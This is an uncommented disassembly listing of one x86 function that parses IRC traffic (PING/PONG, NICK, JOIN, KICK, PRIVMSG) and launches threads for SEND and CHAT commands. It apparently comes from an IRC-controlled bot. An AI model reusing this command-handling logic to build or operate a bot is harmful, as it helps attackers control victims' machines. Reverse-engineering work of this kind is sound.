var_221C = dword ptr -221Ch
var_2218 = byte ptr -2218h
var_2198 = byte ptr -2198h
var_2118 = byte ptr -2118h
var_2098 = dword ptr -2098h
var_2094 = dword ptr -2094h
var_2090 = dword ptr -2090h
var_208C = dword ptr -208Ch
var_2088 = dword ptr -2088h
var_2084 = byte ptr -2084h
var_2004 = byte ptr -2004h
var_1F84 = byte ptr -1F84h
var_1F04 = dword ptr -1F04h
var_1F00 = dword ptr -1F00h
var_1EFC = dword ptr -1EFCh
var_1EF8 = dword ptr -1EF8h
var_1EF4 = dword ptr -1EF4h
var_1EF0 = byte ptr -1EF0h
var_1DF0 = byte ptr -1DF0h
var_1D70 = dword ptr -1D70h
var_1D68 = dword ptr -1D68h
var_1D64 = dword ptr -1D64h
var_1D60 = dword ptr -1D60h
var_1D5C = dword ptr -1D5Ch
var_1D58 = dword ptr -1D58h
var_1D54 = dword ptr -1D54h
var_1D4C = byte ptr -1D4Ch
var_1D38 = byte ptr -1D38h
var_1C34 = byte ptr -1C34h
var_1BB0 = dword ptr -1BB0h
var_1BAC = dword ptr -1BACh
var_1BA8 = dword ptr -1BA8h
var_1BA4 = dword ptr -1BA4h
var_1BA0 = dword ptr -1BA0h
var_1B98 = byte ptr -1B98h
var_1B84 = byte ptr -1B84h
var_1A80 = byte ptr -1A80h
var_1A00 = dword ptr -1A00h
var_19FC = dword ptr -19FCh
var_19F8 = dword ptr -19F8h
var_19F4 = dword ptr -19F4h
var_19F0 = dword ptr -19F0h
var_19EC = dword ptr -19ECh
var_19E8 = byte ptr -19E8h
var_1968 = byte ptr -1968h
var_1928 = byte ptr -1928h
var_1828 = dword ptr -1828h
var_1824 = dword ptr -1824h
var_1818 = dword ptr -1818h
var_1814 = dword ptr -1814h
var_1810 = dword ptr -1810h
var_180C = byte ptr -180Ch
var_17D4 = byte ptr -17D4h
var_17B8 = byte ptr -17B8h
var_1780 = byte ptr -1780h
var_177C = byte ptr -177Ch
var_16FC = byte ptr -16FCh
var_16BC = byte ptr -16BCh
var_162C = dword ptr -162Ch
var_1628 = dword ptr -1628h
var_1624 = dword ptr -1624h
var_1620 = dword ptr -1620h
var_161C = dword ptr -161Ch
var_1618 = byte ptr -1618h
var_1598 = byte ptr -1598h
var_1518 = dword ptr -1518h
var_1514 = dword ptr -1514h
var_1510 = dword ptr -1510h
var_150C = dword ptr -150Ch
var_1508 = byte ptr -1508h
var_14F8 = byte ptr -14F8h
var_1478 = byte ptr -1478h
var_13F8 = dword ptr -13F8h
var_13F0 = dword ptr -13F0h
var_13EC = dword ptr -13ECh
var_13E8 = dword ptr -13E8h
var_13E4 = dword ptr -13E4h
var_13E0 = dword ptr -13E0h
var_13DC = dword ptr -13DCh
var_13D8 = byte ptr -13D8h
var_1358 = byte ptr -1358h
var_12D8 = byte ptr -12D8h
var_1258 = dword ptr -1258h
var_1254 = dword ptr -1254h
var_1250 = dword ptr -1250h
var_124C = dword ptr -124Ch
var_1248 = dword ptr -1248h
var_1244 = dword ptr -1244h
var_1240 = dword ptr -1240h
var_123C = dword ptr -123Ch
var_1234 = byte ptr -1234h
var_11B4 = byte ptr -11B4h
var_1134 = dword ptr -1134h
var_1130 = dword ptr -1130h
var_112C = dword ptr -112Ch
var_1124 = dword ptr -1124h
var_1120 = dword ptr -1120h
var_111C = dword ptr -111Ch
var_1114 = dword ptr -1114h
var_1110 = byte ptr -1110h
var_1090 = byte ptr -1090h
var_1010 = dword ptr -1010h
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1000 = dword ptr -1000h
var_FFC = dword ptr -0FFCh
var_FF8 = dword ptr -0FF8h
var_FF4 = dword ptr -0FF4h
var_FF0 = dword ptr -0FF0h
var_FEC = byte ptr -0FECh
var_F6C = dword ptr -0F6Ch
var_F68 = dword ptr -0F68h
var_F64 = dword ptr -0F64h
var_F60 = dword ptr -0F60h
var_F5C = dword ptr -0F5Ch
var_F58 = byte ptr -0F58h
var_ED8 = dword ptr -0ED8h
var_ED4 = dword ptr -0ED4h
var_ED0 = dword ptr -0ED0h
var_ECC = dword ptr -0ECCh
var_EC8 = dword ptr -0EC8h
var_EC4 = byte ptr -0EC4h
var_E44 = dword ptr -0E44h
var_E40 = dword ptr -0E40h
var_E3C = dword ptr -0E3Ch
var_E38 = dword ptr -0E38h
var_E34 = byte ptr -0E34h
var_E24 = byte ptr -0E24h
var_E04 = byte ptr -0E04h
var_D84 = dword ptr -0D84h
var_D80 = byte ptr -0D80h
var_D00 = byte ptr -0D00h
var_C80 = dword ptr -0C80h
var_C7C = dword ptr -0C7Ch
var_C78 = dword ptr -0C78h
var_C74 = dword ptr -0C74h
var_C70 = dword ptr -0C70h
var_C6C = dword ptr -0C6Ch
var_C68 = dword ptr -0C68h
var_C64 = dword ptr -0C64h
var_C60 = dword ptr -0C60h
var_C5C = byte ptr -0C5Ch
var_BDC = dword ptr -0BDCh
var_BD8 = dword ptr -0BD8h
var_BD4 = dword ptr -0BD4h
var_BD0 = dword ptr -0BD0h
var_BCC = dword ptr -0BCCh
var_BC8 = dword ptr -0BC8h
var_BC4 = byte ptr -0BC4h
var_B44 = dword ptr -0B44h
var_B40 = dword ptr -0B40h
var_B3C = dword ptr -0B3Ch
var_B38 = dword ptr -0B38h
var_B34 = dword ptr -0B34h
var_B30 = dword ptr -0B30h
var_B2C = byte ptr -0B2Ch
var_AAC = dword ptr -0AACh
var_AA8 = dword ptr -0AA8h
var_AA4 = dword ptr -0AA4h
var_AA0 = dword ptr -0AA0h
var_A9C = dword ptr -0A9Ch
var_A98 = dword ptr -0A98h
var_A94 = dword ptr -0A94h
var_A90 = byte ptr -0A90h
var_A10 = dword ptr -0A10h
var_A0C = dword ptr -0A0Ch
var_A08 = dword ptr -0A08h
var_A04 = dword ptr -0A04h
var_A00 = dword ptr -0A00h
var_9FC = byte ptr -9FCh
var_97C = word ptr -97Ch
var_978 = dword ptr -978h
var_970 = dword ptr -970h
var_96C = dword ptr -96Ch
var_968 = dword ptr -968h
var_960 = byte ptr -960h
var_8FF = byte ptr -8FFh
var_8FE = byte ptr -8FEh
var_8FC = byte ptr -8FCh
var_8FB = byte ptr -8FBh
var_8F2 = byte ptr -8F2h
var_8F0 = byte ptr -8F0h
var_8EE = byte ptr -8EEh
var_8ED = byte ptr -8EDh
var_860 = byte ptr -860h
var_850 = byte ptr -850h
var_7D0 = byte ptr -7D0h
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = dword ptr -748h
var_744 = dword ptr -744h
var_740 = dword ptr -740h
var_734 = dword ptr -734h
var_730 = dword ptr -730h
var_728 = dword ptr -728h
var_724 = dword ptr -724h
var_720 = dword ptr -720h
var_71C = dword ptr -71Ch
var_714 = dword ptr -714h
var_710 = byte ptr -710h
var_690 = dword ptr -690h
var_688 = dword ptr -688h
var_684 = dword ptr -684h
var_680 = dword ptr -680h
var_678 = dword ptr -678h
var_674 = dword ptr -674h
var_670 = dword ptr -670h
var_668 = dword ptr -668h
var_63C = dword ptr -63Ch
var_638 = word ptr -638h
var_624 = dword ptr -624h
var_620 = byte ptr -620h
var_5A0 = byte ptr -5A0h
var_590 = dword ptr -590h
var_58C = dword ptr -58Ch
var_584 = dword ptr -584h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_574 = dword ptr -574h
var_570 = byte ptr -570h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = dword ptr -4E8h
var_4E4 = dword ptr -4E4h
var_4E0 = dword ptr -4E0h
var_4D8 = dword ptr -4D8h
var_4D4 = dword ptr -4D4h
var_4D0 = dword ptr -4D0h
var_4C8 = byte ptr -4C8h
var_4BC = byte ptr -4BCh
var_484 = byte ptr -484h
var_474 = byte ptr -474h
var_3F4 = byte ptr -3F4h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_358 = dword ptr -358h
var_354 = dword ptr -354h
var_34C = dword ptr -34Ch
var_348 = dword ptr -348h
var_344 = dword ptr -344h
var_340 = dword ptr -340h
var_338 = byte ptr -338h
var_31C = word ptr -31Ch
var_31A = word ptr -31Ah
var_318 = dword ptr -318h
var_30C = byte ptr -30Ch
var_308 = dword ptr -308h
var_2FC = byte ptr -2FCh
var_2F8 = byte ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2E8 = byte ptr -2E8h
var_2E4 = byte ptr -2E4h
var_2E3 = byte ptr -2E3h
var_2E2 = byte ptr -2E2h
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
var_2C4 = byte ptr -2C4h
var_C4 = byte ptr -0C4h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_93 = byte ptr -93h
var_92 = byte ptr -92h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_50 = byte ptr -50h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 568Ch
call sub_41C500
push ebx
push esi
mov esi, 200h
push edi
xor ebx, ebx
push esi
lea eax, [ebp+var_2C4]
push ebx
push eax
mov [ebp+var_AC], 3
mov [ebp+var_10], ebx
mov [ebp+var_A4], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_2C8], ebx
call sub_41BF70
push 1Bh
lea eax, [ebp+var_338]
push [ebp+arg_10]
push eax
call sub_41BFD0
add esp, 18h
cmp [ebp+arg_0], ebx
jz loc_401F75
push esi
lea eax, [ebp+var_428C]
push ebx
push eax
call sub_41BF70
dec esi
lea eax, [ebp+var_428C]
push esi
push [ebp+arg_0]
push eax
call sub_41BFD0
lea eax, [ebp+var_428C]
push offset asc_42CDC4 ; " :"
push eax
call sub_41C2E0
mov [ebp+var_C], eax
lea eax, [ebp+var_428C]
push esi
push eax
lea eax, [ebp+var_4EF8]
push eax
call sub_41BFD0
mov esi, offset asc_42CDC0 ; " "
lea eax, [ebp+var_4EF8]
push esi
push eax
call sub_41CAD4
add esp, 34h
mov [ebp+var_90], eax
lea edi, [ebp+var_8C]
mov [ebp+var_A8], 1Fh
loc_401BA0: ; CODE XREF: sub_401ACD+E7�j
push esi
push ebx
call sub_41CAD4
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+var_A8]
pop ecx
jnz short loc_401BA0
mov esi, [ebp+var_90]
cmp esi, ebx
jz loc_401F75
cmp [ebp+var_8C], ebx
jz loc_401F75
push 100h
lea eax, [ebp+var_960]
push ebx
push eax
call sub_41BF70
add esp, 0Ch
lea ecx, [ebp+var_14]
push 1Fh
pop edx
push 1
pop edi
loc_401BEE: ; CODE XREF: sub_401ACD+153�j
mov eax, [ecx]
cmp eax, ebx
jz short loc_401C1A
cmp byte ptr [eax], 2Dh
jnz short loc_401C22
cmp [eax+2], bl
jnz short loc_401C22
movsx esi, byte ptr [eax+1]
mov [ecx], ebx
mov [ebp+esi+var_960], 1
mov esi, [ebp+var_90]
mov [eax], bl
mov [eax+1], bl
mov [eax+2], bl
loc_401C1A: ; CODE XREF: sub_401ACD+125�j
dec edx
sub ecx, 4
cmp edx, ebx
jge short loc_401BEE
loc_401C22: ; CODE XREF: sub_401ACD+12A�j
; sub_401ACD+12F�j
cmp [ebp+var_8ED], bl
jz short loc_401C2D
mov [ebp+var_8], edi
loc_401C2D: ; CODE XREF: sub_401ACD+15B�j
cmp [ebp+var_8F2], bl
jz short loc_401C3B
mov [ebp+var_8], ebx
mov [ebp+var_4], edi
loc_401C3B: ; CODE XREF: sub_401ACD+166�j
cmp byte ptr [esi], 0Ah
loc_401C3E: ; DATA XREF: .sxdata:004DEAB1�r
jz short loc_401C75
push 7Fh
lea eax, [ebp+var_E04]
push esi
push eax
call sub_41BFD0
lea eax, [esi+1]
push 17h
push eax
lea eax, [ebp+var_C4]
push eax
call sub_41BFD0
lea eax, [ebp+var_C4]
push offset asc_42CDBC ; "!"
push eax
call sub_41CAD4
add esp, 20h
loc_401C75: ; CODE XREF: sub_401ACD:loc_401C3E�j
push esi
push offset aPing ; "PING"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_401CC6
push [ebp+var_8C]
mov byte ptr [esi+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_409823
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp [eax], ebx
jnz loc_401D6A
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_409823
add esp, 10h
jmp loc_401D6A
; ---------------------------------------------------------------------------
loc_401CC6: ; CODE XREF: sub_401ACD+1B7�j
mov esi, [ebp+var_8C]
push esi
push offset a001 ; "001"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4097D7
push esi
push offset a005 ; "005"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4097D7
push esi
push offset a302_0 ; "302"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_401D2E
push offset a@ ; "@"
push [ebp+var_84]
call sub_41C2E0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_401D6A
inc eax
push 9Fh
push eax
push [ebp+arg_1C]
call sub_41BFD0
jmp short loc_401D67
; ---------------------------------------------------------------------------
loc_401D2E: ; CODE XREF: sub_401ACD+238�j
push esi
push offset a433 ; "433"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_401D71
push ebx
push dword_4290A0
push dword_42909C
push [ebp+arg_10]
call sub_40AE84
add esp, 10h
push [ebp+arg_10]
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_409823
loc_401D67: ; CODE XREF: sub_401ACD+25F�j
add esp, 0Ch
loc_401D6A: ; CODE XREF: sub_401ACD+1D8�j
; sub_401ACD+1F4�j ...
mov eax, edi
jmp loc_401F78
; ---------------------------------------------------------------------------
loc_401D71: ; CODE XREF: sub_401ACD+270�j
mov esi, [ebp+arg_18]
mov [ebp+var_A8], 3
mov edi, 80h
loc_401D83: ; CODE XREF: sub_401ACD+2DB�j
lea eax, [ebp+var_E04]
push eax
push esi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_401DA0
mov [ebp+var_A4], 1
loc_401DA0: ; CODE XREF: sub_401ACD+2C7�j
add esi, edi
dec [ebp+var_A8]
jnz short loc_401D83
mov esi, [ebp+var_8C]
push esi
push offset aKick ; "KICK"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_401E9A
mov esi, [ebp+arg_18]
mov [ebp+arg_24], 3
loc_401DCF: ; CODE XREF: sub_401ACD+392�j
cmp [esi], bl
jz loc_401E5A
push 7Fh
lea eax, [ebp+var_E04]
push esi
push eax
call sub_41BFD0
lea eax, [ebp+var_C4]
add esp, 0Ch
test eax, eax
jz short loc_401E5A
cmp [ebp+var_84], ebx
jz short loc_401E5A
push [ebp+var_84]
lea eax, [ebp+var_C4]
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_401E5A
lea eax, [ebp+var_C4]
mov [esi], bl
push eax
lea eax, [ebp+var_2C4]
push offset unk_42CD50
push eax
call sub_41C266
add esp, 0Ch
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_C4]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_409823
lea eax, [ebp+var_2C4]
push eax
call sub_415D38
add esp, 14h
loc_401E5A: ; CODE XREF: sub_401ACD+304�j
; sub_401ACD+324�j ...
add esi, edi
dec [ebp+arg_24]
jnz loc_401DCF
push [ebp+var_84]
push [ebp+arg_10]
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_401F75
push [ebp+arg_C]
mov eax, [ebp+arg_20]
push [ebp+arg_8]
mov [eax], ebx
push offset aJoinSS ; "JOIN %s %s\r\n"
loc_401E8D: ; CODE XREF: sub_401ACD+5F6�j
; sub_401ACD+8B9�j ...
push [ebp+arg_4]
call sub_409823
jmp loc_404260
; ---------------------------------------------------------------------------
loc_401E9A: ; CODE XREF: sub_401ACD+2F2�j
push esi
push offset aNick ; "NICK"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_401FDD
mov eax, [ebp+var_88]
mov esi, [ebp+arg_18]
inc eax
mov [ebp+arg_0], 3
mov [ebp+arg_24], eax
loc_401EC3: ; CODE XREF: sub_401ACD+448�j
lea eax, [ebp+var_E04]
push eax
push esi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_401F10
lea eax, [ebp+var_E04]
push 21h
push eax
call sub_41C990
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_1C], eax
jz short loc_401F10
push [ebp+arg_24]
lea edi, [esi+2]
mov byte ptr [esi], 3Ah
lea eax, [edi-1]
push eax
call sub_41C890
push [ebp+arg_1C]
push edi
call sub_41C8A0
add esp, 10h
mov edi, 80h
loc_401F10: ; CODE XREF: sub_401ACD+407�j
; sub_401ACD+41E�j
add esi, edi
dec [ebp+arg_0]
jnz short loc_401EC3
lea eax, [ebp+var_C4]
test eax, eax
jz short loc_401F75
cmp [ebp+arg_24], ebx
jz short loc_401F75
push [ebp+arg_10]
lea eax, [ebp+var_C4]
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_401F4D
push 0Fh
push [ebp+arg_24]
push [ebp+arg_10]
call sub_41BFD0
jmp loc_4036A2
; ---------------------------------------------------------------------------
loc_401F4D: ; CODE XREF: sub_401ACD+46C�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_401F52: ; CODE XREF: sub_401ACD+4A6�j
cmp [edi], bl
jz short loc_401F69
lea eax, [ebp+var_E04]
push eax
push edi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_401F7D
loc_401F69: ; CODE XREF: sub_401ACD+487�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_401F52
loc_401F75: ; CODE XREF: sub_401ACD+5B�j
; sub_401ACD+F1�j ...
push 1
loc_401F77: ; CODE XREF: sub_401ACD+2A1E�j
pop eax
loc_401F78: ; CODE XREF: sub_401ACD+29F�j
; sub_401ACD+2A40�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_401F7D: ; CODE XREF: sub_401ACD+49A�j
lea eax, [ebp+var_E04]
push 21h
push eax
call sub_41C990
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_0], eax
jz short loc_401F75
push eax
call sub_41B9C0
push [ebp+arg_24]
mov edi, eax
call sub_41B9C0
add edi, eax
pop ecx
cmp edi, 7Eh
pop ecx
ja short loc_401F75
push [ebp+arg_0]
shl esi, 7
push [ebp+arg_24]
add esi, [ebp+arg_18]
push offset aSS_1 ; ":%s%s"
push esi
call sub_41C266
push ebx
lea eax, [ebp+var_45F0]
push ebx
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_409869
add esp, 24h
jmp short loc_401F75
; ---------------------------------------------------------------------------
loc_401FDD: ; CODE XREF: sub_401ACD+3DC�j
push esi
push offset aPart ; "PART"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_401FFF
push esi
push offset aQuit ; "QUIT"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402026
loc_401FFF: ; CODE XREF: sub_401ACD+51F�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_402004: ; CODE XREF: sub_401ACD+557�j
cmp [edi], bl
jz short loc_40201A
push [ebp+var_90]
push edi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_402067
loc_40201A: ; CODE XREF: sub_401ACD+539�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_402004
loc_402026: ; CODE XREF: sub_401ACD+530�j
push [ebp+var_8C]
push offset a353 ; "353"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_4020C8
push [ebp+var_80]
push [ebp+arg_8]
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_40205A
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_40205A: ; CODE XREF: sub_401ACD+582�j
push [ebp+var_80]
push offset unk_42CCFC
jmp loc_4097CB
; ---------------------------------------------------------------------------
loc_402067: ; CODE XREF: sub_401ACD+54B�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_2C4]
push offset unk_42CCDC
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_415D38
push [ebp+var_8C]
push offset aPart ; "PART"
call sub_41CA50
add esp, 18h
test eax, eax
jnz loc_401F75
lea eax, [ebp+var_2C4]
push eax
mov eax, [ebp+var_90]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_401E8D
; ---------------------------------------------------------------------------
loc_4020C8: ; CODE XREF: sub_401ACD+56D�j
push [ebp+var_8C]
mov esi, offset aPrivmsg ; "PRIVMSG"
push esi
call sub_41CA50
pop ecx
mov edi, offset aNotice ; "NOTICE"
test eax, eax
pop ecx
jz short loc_40211C
push [ebp+var_8C]
push edi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_40211C
push [ebp+var_8C]
push offset dword_42CCC8
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_409644
cmp dword_429088, ebx
jz loc_409644
loc_40211C: ; CODE XREF: sub_401ACD+615�j
; sub_401ACD+627�j
push [ebp+var_8C]
push esi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4022A2
push [ebp+var_8C]
push edi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4022A2
mov eax, [ebp+var_84]
inc [ebp+var_80]
push 4
mov [ebp+var_88], eax
pop esi
mov [ebp+var_AC], esi
loc_402160: ; CODE XREF: sub_401ACD+891�j
; sub_401ACD+8CD�j ...
shl esi, 2
mov eax, [ebp+esi+var_90]
lea edi, [ebp+esi+var_90]
push eax
push offset dword_42CCC0
mov [ebp+arg_8], eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_40253B
push [ebp+esi+var_8C]
push offset aSend ; "SEND"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_402402
cmp [ebp+var_A4], ebx
jz loc_4023DB
push [ebp+esi+var_88]
mov edi, offset aS_8 ; "%s"
lea eax, [ebp+var_1B84]
push edi
push eax
call sub_41C266
add esp, 0Ch
lea eax, [ebp+var_1B98]
push [ebp+esi+var_84]
push edi
push eax
call sub_41C266
push [ebp+esi+var_80]
call sub_41C159
mov [ebp+var_1A00], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1BA0], eax
lea eax, [ebp+var_C4]
push 7Fh
push eax
lea eax, [ebp+var_1A80]
push eax
call sub_41BFD0
mov eax, [ebp+var_4]
add esp, 1Ch
mov [ebp+var_19F8], eax
mov eax, [ebp+var_8]
mov [ebp+var_19F4], eax
lea eax, [ebp+var_1A80]
push eax
lea eax, [ebp+var_1B84]
push eax
lea eax, [ebp+var_2C4]
push offset unk_42CC84
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 1Ah
push eax
call sub_40B3BA
add esp, 1Ch
mov [ebp+var_19FC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1BA0]
push ebx
push eax
push offset sub_416563
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_19FC]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz loc_4023CA
loc_40228C: ; CODE XREF: sub_401ACD+7D3�j
cmp [ebp+var_19F0], ebx
jnz loc_4082DE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40228C
; ---------------------------------------------------------------------------
loc_4022A2: ; CODE XREF: sub_401ACD+65F�j
; sub_401ACD+675�j
push [ebp+var_8C]
push edi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_4022BB
mov [ebp+var_4], 1
loc_4022BB: ; CODE XREF: sub_401ACD+7E5�j
cmp [ebp+var_88], ebx
jz loc_401F75
push offset dword_42CC80
push [ebp+var_88]
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_4022E2
cmp [ebp+var_4], ebx
jz short loc_4022EE
loc_4022E2: ; CODE XREF: sub_401ACD+80E�j
lea eax, [ebp+var_C4]
mov [ebp+var_88], eax
loc_4022EE: ; CODE XREF: sub_401ACD+813�j
cmp [ebp+var_84], ebx
jz loc_401F75
inc [ebp+var_84]
jz short loc_40233A
cmp [ebp+arg_10], ebx
jz short loc_40233A
lea eax, [ebp+var_338]
push eax
call sub_41B9C0
push eax
lea eax, [ebp+var_338]
push [ebp+var_84]
push eax
call sub_41C850
mov esi, eax
add esp, 10h
neg esi
sbb esi, esi
add esi, 4
mov [ebp+var_AC], esi
jmp short loc_402340
; ---------------------------------------------------------------------------
loc_40233A: ; CODE XREF: sub_401ACD+833�j
; sub_401ACD+838�j
mov esi, [ebp+var_AC]
loc_402340: ; CODE XREF: sub_401ACD+86B�j
mov edi, [ebp+esi*4+var_90]
cmp edi, ebx
jz loc_401F75
loc_40234F: ; DATA XREF: .sxdata:004DEE7F�r
push edi
push offset dword_42CC74
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_402160
mov ecx, [ebp+var_88]
cmp byte ptr [ecx], 23h
jz short loc_40238B
mov eax, dword_4CB888
mov eax, off_429160[eax*4]
cmp [eax], bl
jz short loc_40238B
push eax
push ecx
push offset dword_42CC58
jmp loc_401E8D
; ---------------------------------------------------------------------------
loc_40238B: ; CODE XREF: sub_401ACD+8A0�j
; sub_401ACD+8B0�j
push edi
push offset dword_42CC50
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_402160
mov eax, [ebp+esi*4+var_8C]
cmp eax, ebx
jz loc_402160
mov ecx, [ebp+var_88]
cmp byte ptr [ecx], 23h
jz loc_402160
push eax
push ecx
push offset dword_42CC38
jmp loc_401E8D
; ---------------------------------------------------------------------------
loc_4023CA: ; CODE XREF: sub_401ACD+7B9�j
; sub_401ACD+76B7�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42CBFC
jmp loc_4082CF
; ---------------------------------------------------------------------------
loc_4023DB: ; CODE XREF: sub_401ACD+6DD�j
lea eax, [ebp+var_C4]
push eax
push [ebp+esi+var_88]
push offset unk_42CBB8
loc_4023EE: ; CODE XREF: sub_401ACD+7C19�j
; sub_401ACD+7C80�j
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
add esp, 10h
jmp loc_4082DE
; ---------------------------------------------------------------------------
loc_402402: ; CODE XREF: sub_401ACD+6D1�j
push [ebp+esi+var_8C]
push offset aChat ; "CHAT"
call sub_41CA50
loc_402413: ; DATA XREF: sub_4DE2D7+9B�w
; sub_4DE68C+3�r
pop ecx
test eax, eax
pop ecx
jnz loc_402551
cmp [ebp+var_A4], ebx
loc_402423: ; DATA XREF: sub_4DE2D7+A9�r
jz loc_40252A
push 1Bh
loc_40242B: ; DATA XREF: sub_4DE2D7+222�r
call sub_40B602
test eax, eax
pop ecx
jnz loc_402519
push [ebp+esi+var_84]
lea eax, [ebp+var_2AAC]
push offset aS_8 ; "%s"
push eax
call sub_41C266
push [ebp+esi+var_80]
call sub_41C159
mov [ebp+var_2914], eax
mov eax, [ebp+arg_4]
mov [ebp+var_2AB4], eax
lea eax, [ebp+var_C4]
push 7Fh
push eax
lea eax, [ebp+var_2994]
push eax
call sub_41BFD0
mov eax, [ebp+var_4]
add esp, 1Ch
mov [ebp+var_290C], eax
mov eax, [ebp+var_8]
mov [ebp+var_2908], eax
loc_402493: ; DATA XREF: sub_4DE2D7+1C0�r
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_2C4]
push offset unk_42CB90
push eax
call sub_41C266
loc_4024AB: ; DATA XREF: sub_4DE9D0+24�r
push ebx
lea eax, [ebp+var_2C4]
push 1Bh
push eax
call sub_40B3BA
add esp, 18h
mov [ebp+var_2910], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2AB4]
push ebx
push eax
push offset sub_416000
push ebx
push ebx
loc_4024D6: ; DATA XREF: .sxdata:004DED6D�o
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_2910]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_402508
loc_4024F2: ; CODE XREF: sub_401ACD+A39�j
cmp [ebp+var_2904], ebx
jnz loc_4082DE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_4024F2
; ---------------------------------------------------------------------------
loc_402508: ; CODE XREF: sub_401ACD+A23�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42CB58
jmp loc_4082CF
; ---------------------------------------------------------------------------
loc_402519: ; CODE XREF: sub_401ACD+966�j
lea eax, [ebp+var_C4]
push eax
push offset unk_42CB28
jmp loc_4082CF
; ---------------------------------------------------------------------------
loc_40252A: ; CODE XREF: sub_401ACD:loc_402423�j
lea eax, [ebp+var_C4]
push eax
push offset unk_42CAF4
